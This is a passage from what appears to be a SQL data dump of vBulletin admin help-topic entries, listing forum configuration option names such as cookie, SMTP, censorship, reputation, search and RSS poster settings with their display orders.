(4069, 'options', 'options', 'calformat2', 310, 1, 'vbulletin'),
(4070, 'options', 'options', 'logdateformat', 315, 1, 'vbulletin'),
(4071, 'options', 'options', 'cookietimeout', 320, 1, 'vbulletin'),
(4072, 'options', 'options', 'cookiepath', 330, 1, 'vbulletin'),
(4073, 'options', 'options', 'cookiedomain', 340, 1, 'vbulletin'),
(4074, 'options', 'options', 'gzipoutput', 350, 1, 'vbulletin'),
(4075, 'options', 'options', 'gziplevel', 360, 1, 'vbulletin'),
(4076, 'options', 'options', 'addheaders', 370, 1, 'vbulletin'),
(4077, 'options', 'options', 'nocacheheaders', 375, 1, 'vbulletin'),
(4078, 'options', 'options', 'useheaderredirect', 380, 1, 'vbulletin'),
(4079, 'options', 'options', 'allowphpinfo', 390, 1, 'vbulletin'),
(4080, 'options', 'options', 'cachemaxage', 400, 1, 'vbulletin'),
(4081, 'options', 'options', 'threadviewslive', 410, 1, 'vbulletin'),
(4082, 'options', 'options', 'attachmentviewslive', 420, 1, 'vbulletin'),
(4083, 'options', 'options', 'emailsendnum', 430, 1, 'vbulletin'),
(4084, 'options', 'options', 'loadlimit', 450, 1, 'vbulletin'),
(4085, 'options', 'options', 'imagetype', 461, 1, 'vbulletin'),
(4086, 'options', 'options', 'regimagetype', 462, 1, 'vbulletin'),
(4087, 'options', 'options', 'magickpath', 464, 1, 'vbulletin'),
(4088, 'options', 'options', 'regimageoption', 465, 1, 'vbulletin'),
(4089, 'options', 'options', 'safeupload', 480, 1, 'vbulletin'),
(4090, 'options', 'options', 'tmppath', 490, 1, 'vbulletin'),
(4091, 'options', 'options', 'copypostindex', 493, 1, 'vbulletin'),
(4092, 'options', 'options', 'usemailqueue', 500, 1, 'vbulletin'),
(4093, 'options', 'options', 'needfromemail', 510, 1, 'vbulletin'),
(4094, 'options', 'options', 'languageid', 520, 1, 'vbulletin'),
(4095, 'options', 'options', 'styleid', 530, 1, 'vbulletin'),
(4096, 'options', 'options', 'allowchangestyles', 540, 1, 'vbulletin'),
(4097, 'options', 'options', 'cleargifurl', 550, 1, 'vbulletin'),
(4098, 'options', 'options', 'storecssasfile', 560, 1, 'vbulletin'),
(4099, 'options', 'options', 'usepopups', 570, 1, 'vbulletin'),
(4100, 'options', 'options', 'legacypostbit', 575, 1, 'vbulletin'),
(4101, 'options', 'options', 'enableemail', 580, 1, 'vbulletin'),
(4102, 'options', 'options', 'displayemails', 590, 1, 'vbulletin'),
(4103, 'options', 'options', 'secureemail', 600, 1, 'vbulletin'),
(4104, 'options', 'options', 'emailfloodtime', 610, 1, 'vbulletin'),
(4105, 'options', 'options', 'use_smtp', 611, 1, 'vbulletin'),
(4106, 'options', 'options', 'smtp_host', 612, 1, 'vbulletin'),
(4107, 'options', 'options', 'smtp_port', 613, 1, 'vbulletin'),
(4108, 'options', 'options', 'smtp_user', 614, 1, 'vbulletin'),
(4109, 'options', 'options', 'smtp_pass', 615, 1, 'vbulletin'),
(4110, 'options', 'options', 'smtp_tls', 616, 1, 'vbulletin'),
(4111, 'options', 'options', 'enablecensor', 620, 1, 'vbulletin'),
(4112, 'options', 'options', 'censorchar', 630, 1, 'vbulletin'),
(4113, 'options', 'options', 'censorwords', 640, 1, 'vbulletin'),
(4114, 'options', 'options', 'blankasciistrip', 650, 1, 'vbulletin'),
(4115, 'options', 'options', 'allowregistration', 660, 1, 'vbulletin'),
(4116, 'options', 'options', 'usecoppa', 670, 1, 'vbulletin'),
(4117, 'options', 'options', 'moderatenewmembers', 680, 1, 'vbulletin'),
(4118, 'options', 'options', 'regimagecheck', 690, 1, 'vbulletin'),
(4119, 'options', 'options', 'welcomemail', 700, 1, 'vbulletin'),
(4120, 'options', 'options', 'newuseremail', 710, 1, 'vbulletin'),
(4121, 'options', 'options', 'allowmultiregs', 720, 1, 'vbulletin'),
(4122, 'options', 'options', 'verifyemail', 730, 1, 'vbulletin'),
(4123, 'options', 'options', 'requireuniqueemail', 740, 1, 'vbulletin'),
(4124, 'options', 'options', 'minuserlength', 750, 1, 'vbulletin'),
(4125, 'options', 'options', 'maxuserlength', 760, 1, 'vbulletin'),
(4126, 'options', 'options', 'illegalusernames', 770, 1, 'vbulletin'),
(4127, 'options', 'options', 'usernameregex', 771, 1, 'vbulletin'),
(4128, 'options', 'options', 'usereferrer', 775, 1, 'vbulletin'),
(4129, 'options', 'options', 'defaultregoptions', 780, 1, 'vbulletin'),
(4130, 'options', 'options', 'usernamereusedelay', 781, 1, 'vbulletin'),
(4131, 'options', 'options', 'social_moderation', 784, 1, 'vbulletin'),
(4132, 'options', 'options', 'reqbirthday', 785, 1, 'vbulletin'),
(4133, 'options', 'options', 'ctMaxChars', 790, 1, 'vbulletin'),
(4134, 'options', 'options', 'ctCensorWords', 800, 1, 'vbulletin'),
(4135, 'options', 'options', 'minifriends_amount', 805, 1, 'vbulletin'),
(4136, 'options', 'options', 'ctCensorMod', 810, 1, 'vbulletin'),
(4137, 'options', 'options', 'friends_per_page', 815, 1, 'vbulletin'),
(4138, 'options', 'options', 'profilemaxvisitors', 816, 1, 'vbulletin'),
(4139, 'options', 'options', 'softlinebreakchars', 820, 1, 'vbulletin'),
(4140, 'options', 'options', 'sigmax', 830, 1, 'vbulletin'),
(4141, 'options', 'options', 'allowbbcode', 840, 1, 'vbulletin'),
(4142, 'options', 'options', 'allowsmilies', 850, 1, 'vbulletin'),
(4143, 'options', 'options', 'allowbbimagecode', 860, 1, 'vbulletin'),
(4144, 'options', 'options', 'allowhtml', 870, 1, 'vbulletin'),
(4145, 'options', 'options', 'ignoremods', 880, 1, 'vbulletin'),
(4146, 'options', 'options', 'avatarenabled', 890, 1, 'vbulletin'),
(4147, 'options', 'options', 'numavatarswide', 900, 1, 'vbulletin'),
(4148, 'options', 'options', 'numavatarsperpage', 910, 1, 'vbulletin'),
(4149, 'options', 'options', 'profilepicenabled', 920, 1, 'vbulletin'),
(4150, 'options', 'options', 'reputationenable', 930, 1, 'vbulletin'),
(4151, 'options', 'options', 'reputationhide', 940, 1, 'vbulletin'),
(4152, 'options', 'options', 'reputationundefined', 945, 1, 'vbulletin'),
(4153, 'options', 'options', 'reputationdefault', 950, 1, 'vbulletin'),
(4154, 'options', 'options', 'showuserrates', 960, 1, 'vbulletin'),
(4155, 'options', 'options', 'adminpower', 970, 1, 'vbulletin'),
(4156, 'options', 'options', 'rdpower', 980, 1, 'vbulletin'),
(4157, 'options', 'options', 'pcpower', 990, 1, 'vbulletin'),
(4158, 'options', 'options', 'kppower', 1000, 1, 'vbulletin'),
(4159, 'options', 'options', 'minreputationpost', 1010, 1, 'vbulletin'),
(4160, 'options', 'options', 'minreputationcount', 1020, 1, 'vbulletin'),
(4161, 'options', 'options', 'maxreputationperday', 1030, 1, 'vbulletin'),
(4162, 'options', 'options', 'reputationrepeat', 1040, 1, 'vbulletin'),
(4163, 'options', 'options', 'unallowvbcode', 1050, 1, 'vbulletin'),
(4164, 'options', 'options', 'unallowsmilies', 1060, 1, 'vbulletin'),
(4165, 'options', 'options', 'unallowimg', 1070, 1, 'vbulletin'),
(4166, 'options', 'options', 'unallowhtml', 1080, 1, 'vbulletin'),
(4167, 'options', 'options', 'enablememberlist', 1090, 1, 'vbulletin'),
(4168, 'options', 'options', 'memberlistposts', 1093, 1, 'vbulletin'),
(4169, 'options', 'options', 'memberlistfields', 1095, 1, 'vbulletin'),
(4170, 'options', 'options', 'memberlistperpage', 1100, 1, 'vbulletin'),
(4171, 'options', 'options', 'usememberlistadvsearch', 1110, 1, 'vbulletin'),
(4172, 'options', 'options', 'profilelastpost', 1120, 1, 'vbulletin'),
(4173, 'options', 'options', 'enablebanning', 1130, 1, 'vbulletin'),
(4174, 'options', 'options', 'banip', 1140, 1, 'vbulletin'),
(4175, 'options', 'options', 'banemail', 1150, 1, 'vbulletin'),
(4176, 'options', 'options', 'aggressiveemailban', 1155, 1, 'vbulletin'),
(4177, 'options', 'options', 'allowkeepbannedemail', 1160, 1, 'vbulletin'),
(4178, 'options', 'options', 'globalignore', 1170, 1, 'vbulletin'),
(4179, 'options', 'options', 'allowedbbcodes', 1173, 1, 'vbulletin'),
(4180, 'options', 'options', 'codemaxlines', 1178, 1, 'vbulletin'),
(4181, 'options', 'options', 'quickedit', 1179, 1, 'vbulletin'),
(4182, 'options', 'options', 'mqlimit', 1180, 1, 'vbulletin'),
(4183, 'options', 'options', 'multiquote', 1180, 1, 'vbulletin'),
(4184, 'options', 'options', 'quickreply', 1180, 1, 'vbulletin'),
(4185, 'options', 'options', 'postminchars', 1200, 1, 'vbulletin'),
(4186, 'options', 'options', 'ignorequotechars', 1210, 1, 'vbulletin'),
(4187, 'options', 'options', 'titlemaxchars', 1215, 1, 'vbulletin'),
(4188, 'options', 'options', 'quotetitle', 1220, 1, 'vbulletin'),
(4189, 'options', 'options', 'postmaxchars', 1230, 1, 'vbulletin'),
(4190, 'options', 'options', 'maximages', 1240, 1, 'vbulletin'),
(4191, 'options', 'options', 'stopshouting', 1250, 1, 'vbulletin'),
(4192, 'options', 'options', 'allowdynimg', 1260, 1, 'vbulletin'),
(4193, 'options', 'options', 'floodchecktime', 1270, 1, 'vbulletin'),
(4194, 'options', 'options', 'editthreadtitlelimit', 1280, 1, 'vbulletin'),
(4195, 'options', 'options', 'addpolltimeout', 1290, 1, 'vbulletin'),
(4196, 'options', 'options', 'edittimelimit', 1295, 1, 'vbulletin'),
(4197, 'options', 'options', 'noeditedbytime', 1300, 1, 'vbulletin'),
(4198, 'options', 'options', 'logip', 1310, 1, 'vbulletin'),
(4199, 'options', 'options', 'allowvbcodebuttons', 1320, 1, 'vbulletin'),
(4200, 'options', 'options', 'editormodes', 1335, 1, 'vbulletin'),
(4201, 'options', 'options', 'smtotal', 1340, 1, 'vbulletin'),
(4202, 'options', 'options', 'smcolumns', 1350, 1, 'vbulletin'),
(4203, 'options', 'options', 'wysiwyg_smtotal', 1360, 1, 'vbulletin'),
(4204, 'options', 'options', 'attachtotalspace', 1370, 1, 'vbulletin'),
(4205, 'options', 'options', 'attachlimit', 1380, 1, 'vbulletin'),
(4206, 'options', 'options', 'attachboxcount', 1390, 1, 'vbulletin'),
(4207, 'options', 'options', 'attachurlcount', 1395, 1, 'vbulletin'),
(4208, 'options', 'options', 'allowattachdel', 1400, 1, 'vbulletin'),
(4209, 'options', 'options', 'allowclosedattachdel', 1401, 1, 'vbulletin'),
(4210, 'options', 'options', 'allowduplicates', 1410, 1, 'vbulletin'),
(4211, 'options', 'options', 'viewattachedimages', 1420, 1, 'vbulletin'),
(4212, 'options', 'options', 'attachthumbs', 1430, 1, 'vbulletin'),
(4213, 'options', 'options', 'attachthumbssize', 1440, 1, 'vbulletin'),
(4214, 'options', 'options', 'thumbquality', 1445, 1, 'vbulletin'),
(4215, 'options', 'options', 'attachrow', 1450, 1, 'vbulletin'),
(4216, 'options', 'options', 'maxpolloptions', 1460, 1, 'vbulletin'),
(4217, 'options', 'options', 'maxpolllength', 1465, 1, 'vbulletin'),
(4218, 'options', 'options', 'updatelastpost', 1470, 1, 'vbulletin'),
(4219, 'options', 'options', 'showvotes', 1480, 1, 'vbulletin'),
(4220, 'options', 'options', 'votechange', 1490, 1, 'vbulletin'),
(4221, 'options', 'options', 'enablesearches', 1500, 1, 'vbulletin'),
(4222, 'options', 'options', 'searchfloodtime', 1510, 1, 'vbulletin'),
(4223, 'options', 'options', 'minsearchlength', 1520, 1, 'vbulletin'),
(4224, 'options', 'options', 'maxsearchlength', 1530, 1, 'vbulletin'),
(4225, 'options', 'options', 'goodwords', 1540, 1, 'vbulletin'),
(4226, 'options', 'options', 'searchperpage', 1550, 1, 'vbulletin'),
(4227, 'options', 'options', 'maxresults', 1560, 1, 'vbulletin'),
(4228, 'options', 'options', 'allowwildcards', 1570, 1, 'vbulletin'),
(4229, 'options', 'options', 'similarthreadsearch', 1580, 1, 'vbulletin'),
(4230, 'options', 'options', 'searchsharing', 1585, 1, 'vbulletin'),
(4231, 'options', 'options', 'similarthreadthreshold', 1590, 1, 'vbulletin'),
(4232, 'options', 'options', 'badwords', 1595, 1, 'vbulletin'),
(4233, 'options', 'options', 'searchimagecheck', 1598, 1, 'vbulletin'),
(4234, 'options', 'options', 'multimatchscore', 1600, 1, 'vbulletin'),
(4235, 'options', 'options', 'datescore', 1610, 1, 'vbulletin'),
(4236, 'options', 'options', 'threadtitlescore', 1620, 1, 'vbulletin'),
(4237, 'options', 'options', 'posttitlescore', 1630, 1, 'vbulletin'),
(4238, 'options', 'options', 'replyscore', 1640, 1, 'vbulletin'),
(4239, 'options', 'options', 'replyfunc', 1650, 1, 'vbulletin'),
(4240, 'options', 'options', 'viewscore', 1660, 1, 'vbulletin'),
(4241, 'options', 'options', 'viewfunc', 1670, 1, 'vbulletin'),
(4242, 'options', 'options', 'ratescore', 1680, 1, 'vbulletin'),
(4243, 'options', 'options', 'ratefunc', 1690, 1, 'vbulletin'),
(4244, 'options', 'options', 'forumhome', 1700, 1, 'vbulletin'),
(4245, 'options', 'options', 'displayloggedin', 1710, 1, 'vbulletin'),
(4246, 'options', 'options', 'showbirthdays', 1720, 1, 'vbulletin'),
(4247, 'options', 'options', 'birthdaydatecut', 1730, 1, 'vbulletin'),
(4248, 'options', 'options', 'showevents', 1740, 1, 'vbulletin'),
(4249, 'options', 'options', 'showholidays', 1750, 1, 'vbulletin'),
(4250, 'options', 'options', 'showeventtype', 1760, 1, 'vbulletin'),
(4251, 'options', 'options', 'activememberdays', 1765, 1, 'vbulletin'),
(4252, 'options', 'options', 'activememberoptions', 1767, 1, 'vbulletin'),
(4253, 'options', 'options', 'forumhomedepth', 1770, 1, 'vbulletin'),
(4254, 'options', 'options', 'forumdisplaydepth', 1780, 1, 'vbulletin'),
(4255, 'options', 'options', 'subforumdepth', 1790, 1, 'vbulletin'),
(4256, 'options', 'options', 'showforumdescription', 1800, 1, 'vbulletin'),
(4257, 'options', 'options', 'showprivateforums', 1805, 1, 'vbulletin'),
(4258, 'options', 'options', 'hideprivateforums', 1810, 1, 'vbulletin'),
(4259, 'options', 'options', 'showlocks', 1820, 1, 'vbulletin'),
(4260, 'options', 'options', 'lastthreadchars', 1830, 1, 'vbulletin'),
(4261, 'options', 'options', 'showmoderatorcolumn', 1840, 1, 'vbulletin'),
(4262, 'options', 'options', 'nav_forumdesc', 1845, 1, 'vbulletin'),
(4263, 'options', 'options', 'showprefixlastpost', 1845, 1, 'vbulletin'),
(4264, 'options', 'options', 'showforumusers', 1850, 1, 'vbulletin'),
(4265, 'options', 'options', 'maxthreads', 1860, 1, 'vbulletin'),
(4266, 'options', 'options', 'showstickies', 1870, 1, 'vbulletin'),
(4267, 'options', 'options', 'showdots', 1880, 1, 'vbulletin'),
(4268, 'options', 'options', 'usehotthreads', 1890, 1, 'vbulletin'),
(4269, 'options', 'options', 'hotnumberviews', 1900, 1, 'vbulletin'),
(4270, 'options', 'options', 'hotnumberposts', 1910, 1, 'vbulletin'),
(4271, 'options', 'options', 'linktopages', 1920, 1, 'vbulletin'),
(4272, 'options', 'options', 'maxmultipage', 1930, 1, 'vbulletin'),
(4273, 'options', 'options', 'threadpreview', 1940, 1, 'vbulletin'),
(4274, 'options', 'options', 'oneannounce', 1950, 1, 'vbulletin'),
(4275, 'options', 'options', 'showthreadusers', 1960, 1, 'vbulletin'),
(4276, 'options', 'options', 'maxposts', 1970, 1, 'vbulletin'),
(4277, 'options', 'options', 'usermaxposts', 1980, 1, 'vbulletin'),
(4278, 'options', 'options', 'showdeficon', 1990, 1, 'vbulletin'),
(4279, 'options', 'options', 'wordwrap', 2010, 1, 'vbulletin'),
(4280, 'options', 'options', 'threadvoted', 2020, 1, 'vbulletin'),
(4281, 'options', 'options', 'threadsubscribed', 2030, 1, 'vbulletin'),
(4282, 'options', 'options', 'showsimilarthreads', 2040, 1, 'vbulletin'),
(4283, 'options', 'options', 'postelements', 2045, 1, 'vbulletin'),
(4284, 'options', 'options', 'allowthreadedmode', 2050, 1, 'vbulletin'),
(4285, 'options', 'options', 'threadedmode', 2060, 1, 'vbulletin'),
(4286, 'options', 'options', 'threaded_listdepth', 2070, 1, 'vbulletin'),
(4287, 'options', 'options', 'threaded_maxcache', 2080, 1, 'vbulletin'),
(4288, 'options', 'options', 'threaded_trimtitle', 2085, 1, 'vbulletin'),
(4289, 'options', 'options', 'enablepms', 2090, 1, 'vbulletin'),
(4290, 'options', 'options', 'checknewpm', 2100, 1, 'vbulletin'),
(4291, 'options', 'options', 'pmmaxchars', 2110, 1, 'vbulletin'),
(4292, 'options', 'options', 'pmfloodtime', 2120, 1, 'vbulletin'),
(4293, 'options', 'options', 'pmperpage', 2130, 1, 'vbulletin'),
(4294, 'options', 'options', 'pmmaxperpage', 2140, 1, 'vbulletin'),
(4295, 'options', 'options', 'privallowicons', 2150, 1, 'vbulletin'),
(4296, 'options', 'options', 'privallowbbcode', 2160, 1, 'vbulletin'),
(4297, 'options', 'options', 'privallowsmilies', 2170, 1, 'vbulletin'),
(4298, 'options', 'options', 'privallowbbimagecode', 2180, 1, 'vbulletin'),
(4299, 'options', 'options', 'privallowhtml', 2190, 1, 'vbulletin'),
(4300, 'options', 'options', 'WOLenable', 2200, 1, 'vbulletin'),
(4301, 'options', 'options', 'WOLrefresh', 2210, 1, 'vbulletin'),
(4302, 'options', 'options', 'WOLguests', 2220, 1, 'vbulletin'),
(4303, 'options', 'options', 'WOLresolve', 2230, 1, 'vbulletin'),
(4304, 'options', 'options', 'enablespiders', 2240, 1, 'vbulletin'),
(4305, 'options', 'options', 'archiveenabled', 2270, 1, 'vbulletin'),
(4306, 'options', 'options', 'archive_threadtype', 2275, 1, 'vbulletin'),
(4307, 'options', 'options', 'archive_threadsperpage', 2280, 1, 'vbulletin'),
(4308, 'options', 'options', 'archive_postsperpage', 2290, 1, 'vbulletin'),
(4309, 'options', 'options', 'adminquickstats', 2300, 1, 'vbulletin'),
(4310, 'options', 'options', 'cpstylefolder', 2310, 1, 'vbulletin'),
(4311, 'options', 'options', 'timeoutcontrolpanel', 2320, 1, 'vbulletin'),
(4312, 'options', 'options', 'cp_collapse_forums', 2330, 1, 'vbulletin'),
(4313, 'options', 'options', 'cp_usereditcolumns', 2340, 1, 'vbulletin'),
(4314, 'options', 'options', 'externaljs', 2350, 1, 'vbulletin'),
(4315, 'options', 'options', 'externalrss', 2360, 1, 'vbulletin'),
(4316, 'options', 'options', 'externalxml', 2370, 1, 'vbulletin'),
(4317, 'options', 'options', 'externalcutoff', 2375, 1, 'vbulletin'),
(4318, 'options', 'options', 'errorlogdatabase', 2380, 1, 'vbulletin'),
(4319, 'options', 'options', 'errorlogsecurity', 2390, 1, 'vbulletin'),
(4320, 'options', 'options', 'errorlogphp', 2395, 1, 'vbulletin'),
(4321, 'options', 'options', 'errorlogmaxsize', 2400, 1, 'vbulletin'),
(4322, 'options', 'options', 'disableerroremail', 2410, 1, 'vbulletin'),
(4323, 'options', 'options', 'enablehooks', 2470, 1, 'vbulletin'),
(4324, 'options', 'options', 'usercss_allowed_font_sizes', 2610, 1, 'vbulletin'),
(4325, 'options', 'options', 'usercss_allowed_border_widths', 2620, 1, 'vbulletin'),
(4326, 'options', 'options', 'vm_maxchars', 2700, 1, 'vbulletin'),
(4327, 'options', 'options', 'vm_perpage', 2720, 1, 'vbulletin'),
(4328, 'options', 'options', 'vm_maxperpage', 2730, 1, 'vbulletin'),
(4329, 'options', 'options', 'vm_moderation', 2740, 1, 'vbulletin'),
(4330, 'options', 'searchtype', '', 1, 1, 'vbulletin'),
(4331, 'options', 'searchtype', 'deleteindex', 10, 1, 'vbulletin'),
(4332, 'passwordcheck', 'check', 'do_banned', 1, 1, 'vbulletin'),
(4333, 'passwordcheck', 'check', 'email', 1, 1, 'vbulletin'),
(4334, 'passwordcheck', 'check', 'email_from', 1, 1, 'vbulletin'),
(4335, 'passwordcheck', 'check', 'email_subject', 1, 1, 'vbulletin'),
(4336, 'passwordcheck', 'check', 'languageid', 1, 1, 'vbulletin'),
(4337, 'passwordcheck', 'check', 'period', 1, 1, 'vbulletin'),
(4338, 'passwordcheck', 'check', 'quantity', 1, 1, 'vbulletin'),
(4339, 'passwordcheck', 'check', 'reset_on_error', 1, 1, 'vbulletin'),
(4340, 'phrase', '', '', 1, 1, 'vbulletin'),
(4341, 'phrase', 'add', '', 1, 1, 'vbulletin'),
(4342, 'phrase', 'add,edit', 'phrasetypeid', 20, 1, 'vbulletin'),
(4343, 'phrase', 'add,edit', 'varname', 30, 1, 'vbulletin'),
(4344, 'phrase', 'add,edit', 'text', 40, 1, 'vbulletin'),
(4345, 'phrase', 'delete', '', 1, 1, 'vbulletin'),
(4346, 'phrase', 'edit', '', 1, 1, 'vbulletin'),
(4347, 'phrase', 'edit', 'languageid', 10, 1, 'vbulletin'),
(4348, 'phrase', 'findorphans', '', 1, 1, 'vbulletin'),
(4349, 'phrase', 'findupdates', '', 1, 1, 'vbulletin'),
(4350, 'phrase', 'manageorphans', '', 1, 1, 'vbulletin'),
(4351, 'phrase', 'modify', '', 1, 1, 'vbulletin'),
(4352, 'phrase', 'quickref', '', 1, 1, 'vbulletin'),
(4353, 'phrase', 'search', '', 1, 1, 'vbulletin'),
(4354, 'phrase', 'search', 'searchstring', 20, 1, 'vbulletin'),
(4355, 'phrase', 'search', 'languageid', 25, 1, 'vbulletin'),
(4356, 'phrase', 'search', 'searchwhere', 30, 1, 'vbulletin'),
(4357, 'phrase', 'search', 'casesensitive', 40, 1, 'vbulletin'),
(4358, 'phrase', 'search', 'replacestring', 50, 1, 'vbulletin'),
(4359, 'plugin', 'productadd', 'allowoverwrite', 4, 1, 'vbulletin'),
(4360, 'plugin', 'productadd,productedit', 'productid', 5, 1, 'vbulletin'),
(4361, 'plugin', 'productadd,productedit', 'title', 10, 1, 'vbulletin'),
(4362, 'plugin', 'productadd,productedit', 'version', 20, 1, 'vbulletin'),
(4363, 'plugin', 'productadd,productedit', 'description', 30, 1, 'vbulletin'),
(4364, 'plugin', 'productadd,productedit', 'url', 40, 1, 'vbulletin'),
(4365, 'plugin', 'productadd,productedit', 'versioncheckurl', 50, 1, 'vbulletin'),
(4366, 'plugin', 'productedit', 'dependencytype', 60, 1, 'vbulletin'),
(4367, 'plugin', 'productedit', 'maxversion', 70, 1, 'vbulletin'),
(4368, 'plugin', 'productedit', 'minversion', 80, 1, 'vbulletin'),
(4369, 'plugin', 'productedit', 'installcode', 90, 1, 'vbulletin'),
(4370, 'plugin', 'productedit', 'uninstallcode', 100, 1, 'vbulletin'),
(4371, 'prefix', 'addprefix,editprefix', 'prefixid', 1, 1, 'vbulletin'),
(4372, 'prefix', 'addprefix,editprefix', 'prefixsetid', 10, 1, 'vbulletin'),
(4373, 'prefix', 'addprefix,editprefix', 'title_plain', 20, 1, 'vbulletin'),
(4374, 'prefix', 'addprefix,editprefix', 'title_rich', 30, 1, 'vbulletin'),
(4375, 'prefix', 'addprefix,editprefix', 'displayorder', 40, 1, 'vbulletin'),
(4376, 'prefix', 'addset,editset', 'prefixsetid', 1, 1, 'vbulletin'),
(4377, 'prefix', 'addset,editset', 'title', 10, 1, 'vbulletin'),
(4378, 'prefix', 'addset,editset', 'forumids', 20, 1, 'vbulletin'),
(4379, 'prefix', 'addset,editset', 'displayorder', 30, 1, 'vbulletin'),
(4380, 'prefix', 'list', '', 1, 1, 'vbulletin'),
(4381, 'profilefield', '', '', 1, 1, 'vbulletin'),
(4382, 'profilefield', 'add', '', 1, 1, 'vbulletin'),
(4383, 'profilefield', 'add', 'profilefieldtype', 1, 1, 'vbulletin'),
(4384, 'profilefield', 'add,edit', 'title', 20, 1, 'vbulletin'),
(4385, 'profilefield', 'add,edit', 'description', 30, 1, 'vbulletin'),
(4386, 'profilefield', 'add,edit', 'profilefieldcategoryid', 35, 1, 'vbulletin'),
(4387, 'profilefield', 'add,edit', 'data', 40, 1, 'vbulletin'),
(4388, 'profilefield', 'add,edit', 'maxlength', 50, 1, 'vbulletin'),
(4389, 'profilefield', 'add,edit', 'size', 60, 1, 'vbulletin'),
(4390, 'profilefield', 'add,edit', 'newtype', 65, 1, 'vbulletin'),
(4391, 'profilefield', 'add,edit', 'height', 70, 1, 'vbulletin'),
(4392, 'profilefield', 'add,edit', 'def', 120, 1, 'vbulletin'),
(4393, 'profilefield', 'add,edit', 'perline', 140, 1, 'vbulletin'),
(4394, 'profilefield', 'add,edit', 'boxheight', 150, 1, 'vbulletin'),
(4395, 'profilefield', 'add,edit', 'displayorder', 160, 1, 'vbulletin'),
(4396, 'profilefield', 'add,edit', 'required', 170, 1, 'vbulletin'),
(4397, 'profilefield', 'add,edit', 'editable', 175, 1, 'vbulletin'),
(4398, 'profilefield', 'add,edit', 'hidden', 180, 1, 'vbulletin'),
(4399, 'profilefield', 'add,edit', 'searchable', 190, 1, 'vbulletin'),
(4400, 'profilefield', 'add,edit', 'memberlist', 200, 1, 'vbulletin'),
(4401, 'profilefield', 'add,edit', 'optional', 210, 1, 'vbulletin'),
(4402, 'profilefield', 'add,edit', 'regex', 240, 1, 'vbulletin'),
(4403, 'profilefield', 'add,edit', 'form', 250, 1, 'vbulletin'),
(4404, 'profilefield', 'edit', '', 1, 1, 'vbulletin'),
(4405, 'profilefield', 'editcat', '', 1, 1, 'vbulletin'),
(4406, 'profilefield', 'editcat', 'allowprivacy', 1, 1, 'vbulletin'),
(4407, 'profilefield', 'editcat', 'title', 1, 1, 'vbulletin'),
(4408, 'profilefield', 'editcat', 'desc', 2, 1, 'vbulletin'),
(4409, 'profilefield', 'editcat', 'location', 3, 1, 'vbulletin'),
(4410, 'profilefield', 'editcat', 'displayorder', 4, 1, 'vbulletin'),
(4411, 'profilefield', 'modify', '', 1, 1, 'vbulletin'),
(4412, 'profilefield', 'remove', '', 1, 1, 'vbulletin'),
(4413, 'queries', '', '', 1, 1, 'vbulletin'),
(4414, 'queries', 'modify', '', 1, 1, 'vbulletin'),
(4415, 'queries', 'modify', 'autoquery', 10, 1, 'vbulletin'),
(4416, 'queries', 'modify', 'query', 20, 1, 'vbulletin'),
(4417, 'queries', 'modify', 'perpage', 30, 1, 'vbulletin'),
(4418, 'ranks', '', '', 1, 1, 'vbulletin'),
(4419, 'ranks', 'add', '', 1, 1, 'vbulletin'),
(4420, 'ranks', 'add,edit', 'ranklevel', 10, 1, 'vbulletin'),
(4421, 'ranks', 'add,edit', 'minposts', 20, 1, 'vbulletin'),
(4422, 'ranks', 'add,edit', 'usergroupid', 30, 1, 'vbulletin'),
(4423, 'ranks', 'add,edit', 'rankimg', 40, 1, 'vbulletin'),
(4424, 'ranks', 'add,edit', 'rankhtml', 50, 1, 'vbulletin'),
(4425, 'ranks', 'add,edit', 'stack', 60, 1, 'vbulletin'),
(4426, 'ranks', 'add,edit', 'display', 70, 1, 'vbulletin'),
(4427, 'ranks', 'edit', '', 1, 1, 'vbulletin'),
(4428, 'ranks', 'modify', '', 1, 1, 'vbulletin'),
(4429, 'ranks', 'remove', '', 1, 1, 'vbulletin'),
(4430, 'repair', '', '', 1, 1, 'vbulletin'),
(4431, 'repair', 'list', '', 1, 1, 'vbulletin'),
(4432, 'repair', 'list', 'optimizetables', 1, 1, 'vbulletin'),
(4433, 'repair', 'list', 'repairtables', 1, 1, 'vbulletin'),
(4434, 'replacement', '', '', 1, 1, 'vbulletin'),
(4435, 'replacement', 'add', '', 1, 1, 'vbulletin'),
(4436, 'replacement', 'add', 'dostyleid', 10, 1, 'vbulletin'),
(4437, 'replacement', 'add,edit', 'findtext', 20, 1, 'vbulletin'),
(4438, 'replacement', 'add,edit', 'replacetext', 30, 1, 'vbulletin'),
(4439, 'replacement', 'edit', '', 1, 1, 'vbulletin'),
(4440, 'replacement', 'modify', '', 1, 1, 'vbulletin'),
(4441, 'replacement', 'remove', '', 1, 1, 'vbulletin'),
(4442, 'resources', '', '', 1, 1, 'vbulletin'),
(4443, 'resources', 'index', '', 1, 1, 'vbulletin'),
(4444, 'resources', 'index', 'forumid', 10, 1, 'vbulletin'),
(4445, 'resources', 'index', 'usergroupid', 20, 1, 'vbulletin'),
(4446, 'resources', 'view', '', 1, 1, 'vbulletin'),
(4447, 'resources', 'viewuser', '', 1, 1, 'vbulletin'),
(4448, 'rssposter', 'edit', 'resetlastrun', 10, 1, 'vbulletin'),
(4449, 'rssposter', 'edit', 'enabled', 20, 1, 'vbulletin'),
(4450, 'rssposter', 'edit', 'title', 30, 1, 'vbulletin'),
(4451, 'rssposter', 'edit', 'url', 40, 1, 'vbulletin'),
(4452, 'rssposter', 'edit', 'ttl', 50, 1, 'vbulletin'),
(4453, 'rssposter', 'edit', 'maxresults', 60, 1, 'vbulletin'),
(4454, 'rssposter', 'edit', 'searchwords', 70, 1, 'vbulletin'),
(4455, 'rssposter', 'edit', 'username', 80, 1, 'vbulletin'),
(4456, 'rssposter', 'edit', 'forumid', 90, 1, 'vbulletin'),
(4457, 'rssposter', 'edit', 'allowsmilies', 100, 1, 'vbulletin'),
(4458, 'rssposter', 'edit', 'showsignature', 110, 1, 'vbulletin'),
(4459, 'rssposter', 'edit', 'html2bbcode', 115, 1, 'vbulletin'),
(4460, 'rssposter', 'edit', 'titletemplate', 120, 1, 'vbulletin'),
(4461, 'rssposter', 'edit', 'bodytemplate', 130, 1, 'vbulletin'),
(4462, 'rssposter', 'edit', 'itemtype', 140, 1, 'vbulletin'),
(4463, 'rssposter', 'edit', 'prefixid', 145, 1, 'vbulletin'),
(4464, 'rssposter', 'edit', 'iconid', 150, 1, 'vbulletin'),
(4465, 'rssposter', 'edit', 'stickthread', 160, 1, 'vbulletin'),
(4466, 'rssposter', 'edit', 'moderatethread', 170, 1, 'vbulletin'),
(4467, 'rssposter', 'edit', 'threadactiondelay', 180, 1, 'vbulletin'),
